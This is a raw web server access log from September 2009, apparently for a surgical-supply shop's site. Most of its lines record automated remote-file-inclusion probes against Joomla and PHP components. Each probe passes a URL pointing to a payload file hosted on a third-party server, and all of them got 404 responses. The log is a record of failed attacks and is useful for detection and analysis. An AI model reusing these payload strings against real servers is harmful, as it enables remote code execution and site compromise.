91.121.89.135 - - [04/Sep/2009:04:49:01 -0400] "GET /logs/access_log.Q109072000%20%20///ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:49:01 -0400] "GET /logs/access_log.Q109080100%20%20///ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
220.231.126.252 - - [04/Sep/2009:04:49:46 -0400] "GET /logs/access_log.Q109051000%20%20///i.social.php?Q=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
74.6.22.87 - - [04/Sep/2009:04:49:48 -0400] "GET /images/_notes/nav_lower_bgrd.jpg.mno HTTP/1.0" 200 266 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.233.69.41 - - [04/Sep/2009:04:49:49 -0400] "GET /logs/access_log.Q109080600//components/com_simpleboard/image_upload.php?sbp=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.233.69.41 - - [04/Sep/2009:04:49:49 -0400] "GET /logs/access_log.Q109072000//components/com_simpleboard/image_upload.php?sbp=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:04:50:10 -0400] "GET //login.php//ammember/login.php=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:04:50:10 -0400] "GET /logs/access_log.Q109081100%20%20//login.php//ammember/login.php=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:04:50:10 -0400] "GET /logs//login.php//ammember/login.php=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.233.52.18 - - [04/Sep/2009:04:50:46 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
222.233.52.18 - - [04/Sep/2009:04:50:46 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
222.233.52.18 - - [04/Sep/2009:04:50:46 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
222.233.52.18 - - [04/Sep/2009:04:50:46 -0400] "GET /logs/access_log.Q109051200//admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
211.233.69.41 - - [04/Sep/2009:04:51:12 -0400] "GET /logs/access_log.Q109080600//components/com_simpleboard/image_upload.php?sbp=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.233.69.41 - - [04/Sep/2009:04:51:12 -0400] "GET /logs/access_log.Q109072000//components/com_simpleboard/image_upload.php?sbp=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:51:46 -0400] "GET //skin_shop/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:51:46 -0400] "GET /logs//skin_shop/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:51:46 -0400] "GET /logs/access_log.Q109072000%20%20//skin_shop/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:51:47 -0400] "GET //skin_shop/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:51:47 -0400] "GET /logs//skin_shop/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:51:47 -0400] "GET /logs/access_log.Q109072000//skin_shop/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:51:47 -0400] "GET /logs/access_log.Q109080100%20%20//skin_shop/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:51:48 -0400] "GET /logs/access_log.Q109080100//skin_shop/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
121.78.116.209 - - [04/Sep/2009:04:51:51 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.78.116.209 - - [04/Sep/2009:04:51:51 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
220.231.126.252 - - [04/Sep/2009:04:52:24 -0400] "GET /logs/access_log.Q109060800%20%20///i.social.php?Q=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:04:52:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.236.47.182 - - [04/Sep/2009:04:53:07 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:04:53:07 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:04:53:07 -0400] "GET /logs/access_log.Q109071300/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:04:53:07 -0400] "GET /logs/access_log.Q109061200/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
80.67.26.40 - - [04/Sep/2009:04:54:33 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
80.67.26.40 - - [04/Sep/2009:04:54:33 -0400] "GET /logs/access_log.Q109061700%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
80.67.26.40 - - [04/Sep/2009:04:54:33 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.184.252.3 - - [04/Sep/2009:04:54:58 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
58.184.252.3 - - [04/Sep/2009:04:54:58 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.184.252.3 - - [04/Sep/2009:04:54:58 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:55:06 -0400] "GET /shop/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:55:06 -0400] "GET /logs/shop/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:55:06 -0400] "GET /logs/access_log.Q109072000/shop/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:55:07 -0400] "GET /logs/access_log.Q109080100/shop/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
80.67.26.40 - - [04/Sep/2009:04:55:07 -0400] "GET /logs/error_log.Q109073000%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:55:07 -0400] "GET /shop/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:55:07 -0400] "GET /logs/shop/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:55:07 -0400] "GET /logs/access_log.Q109072000%20%20/shop/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:55:08 -0400] "GET /logs/access_log.Q109080100%20%20/shop/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.249.71.201 - - [04/Sep/2009:04:55:12 -0400] "GET /images/over-index5_mallet.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
91.121.89.135 - - [04/Sep/2009:04:55:38 -0400] "GET //ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:55:38 -0400] "GET /logs//ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:55:38 -0400] "GET /logs/access_log.Q109072000//ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:55:42 -0400] "GET /logs/access_log.Q109080100//ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Sep/2009:04:55:47 -0400] "GET /logs/access_log.Q109080900%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Sep/2009:04:55:52 -0400] "GET /logs/access_log.Q109080900%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Sep/2009:04:56:17 -0400] "GET /logs/access_log.Q109080900%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.218.40.180 - - [04/Sep/2009:04:56:35 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.218.40.180 - - [04/Sep/2009:04:56:35 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.218.40.180 - - [04/Sep/2009:04:56:35 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Sep/2009:04:56:56 -0400] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Sep/2009:04:56:56 -0400] "GET /logs/access_log.Q109072000/////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Sep/2009:04:56:56 -0400] "GET /////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Sep/2009:04:57:01 -0400] "GET /logs/access_log.Q109080100/////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.78.116.209 - - [04/Sep/2009:04:57:13 -0400] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
121.78.116.209 - - [04/Sep/2009:04:57:14 -0400] "GET /////bbs//skin/ggambo7002_board/write.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.78.116.209 - - [04/Sep/2009:04:57:15 -0400] "GET /logs/access_log.Q109080100/////bbs//skin/ggambo7002_board/write.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.78.116.209 - - [04/Sep/2009:04:57:17 -0400] "GET /logs/access_log.Q109072000/////bbs//skin/ggambo7002_board/write.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:04:57:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.116.209 - - [04/Sep/2009:04:58:03 -0400] "GET /logs/access_log.Q109072500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.218.40.180 - - [04/Sep/2009:04:58:10 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.218.40.180 - - [04/Sep/2009:04:58:10 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.218.40.180 - - [04/Sep/2009:04:58:10 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.218.40.180 - - [04/Sep/2009:04:58:31 -0400] "GET /logs/access_log.Q109060600%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
66.249.71.201 - - [04/Sep/2009:04:58:54 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L6074E03D2B7896003EE901C+WSEQ(S0060):1+OUITEM(A0200):04948702 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.121.89.135 - - [04/Sep/2009:04:59:22 -0400] "GET /logs/access_log.Q109072000%20%20//ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:59:23 -0400] "GET /logs/access_log.Q109080100%20%20//ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:04:59:40 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:04:59:40 -0400] "GET /logs/access_log.Q109071300/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:04:59:40 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:04:59:45 -0400] "GET /logs/access_log.Q109061200/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
220.247.11.218 - - [04/Sep/2009:05:00:41 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:41 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
59.27.95.144 - - [04/Sep/2009:05:00:43 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
59.27.95.144 - - [04/Sep/2009:05:00:43 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
220.247.11.218 - - [04/Sep/2009:05:00:43 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:44 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:48 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493 HTTP/1.1" 200 37476 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:49 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:49 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:50 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:50 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:50 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:50 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:51 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:51 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:51 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:52 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:52 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:52 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:53 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:53 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:53 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:54 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:54 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:54 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
